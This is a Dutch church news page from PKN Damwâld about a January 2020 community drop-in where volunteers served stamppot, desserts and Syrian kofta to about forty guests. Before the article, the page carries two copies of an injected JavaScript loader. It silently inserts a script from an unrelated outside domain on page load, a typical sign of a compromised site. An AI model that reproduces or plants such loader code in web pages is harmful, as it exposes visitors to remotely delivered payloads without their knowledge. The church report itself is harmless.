;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); IT Trefpunt: De inloop op 16 januari 2020 met afsluitende warme maaltijd - PKN Damwâld

IT Trefpunt: De inloop op 16 januari 2020 met afsluitende warme maaltijd

Gepubliceerd op: donderdag 23 januari 2020

Een jaar geleden hebben wij onze gasten getrakteerd op stampotten van de enige echte Groenteman in Damwald, van Klaas en Maaike. Die waren bijzonder lekker!!
Toch kwam toen de opmerking van enkele vrijwilligers: dat zouden wij zelf ook wel kunnen doen, zelf stampotten maken. En ja, dat moet men niet tegen mij zeggen. Ik had het goed opgeslagen en toen ik eraan herinnerde was het geen enkel probleem, in tegendeel! Er werd enthousiast gereageerd en afspraken over wie doet en maakt wat waren snel gemaakt.
Vorige week konden ongeveer 40 gasten en vrijwilligers genieten van 4 soorten stampot met daarbij spekjes, verse worst, rookworst en speklapjes, verzorgd door: Mattie de Boer, Hennie en Jan van Olderen, Anneke Schaafsma en Pietje Boersma. En Pietje had ook zelfgemaakte toetjes zoals warme gele vla met tutti frutti, chocoladevla met slagroom en hangop met verse vruchten. Daarnaast had Faten gezorgd voor Kofta, een Syrische vleeslekkernij.
Pieter Huizenga, Alie Ros en Froukje Kingma zorgden voor de gasten en zetten met de koster alles klaar voor de maaltijd. Onze andere vrijwilligers Inge, Lutske en Sietse konden die ochtend helaas niet aanwezig zijn.
Ik wil graag iedereen die zich heeft ingezet heel hartelijk danken. Het was geweldig!! Onze gasten vonden dat ook en lieten dat duidelijk merken. En zoals het hoort, was er voldoende en hebben sommigen nog een portie mee naar huis genomen, niet te vergeten onze koster Peter. Conclusie van de vrijwilligers: dit willen we graag weer doen, maar dan zetten we de gasten wat anders voor. Dus wordt vervolgd!! Van deze prachtige ochtend en gebeurtenis kunt u even proeven door de foto’s te bekijken.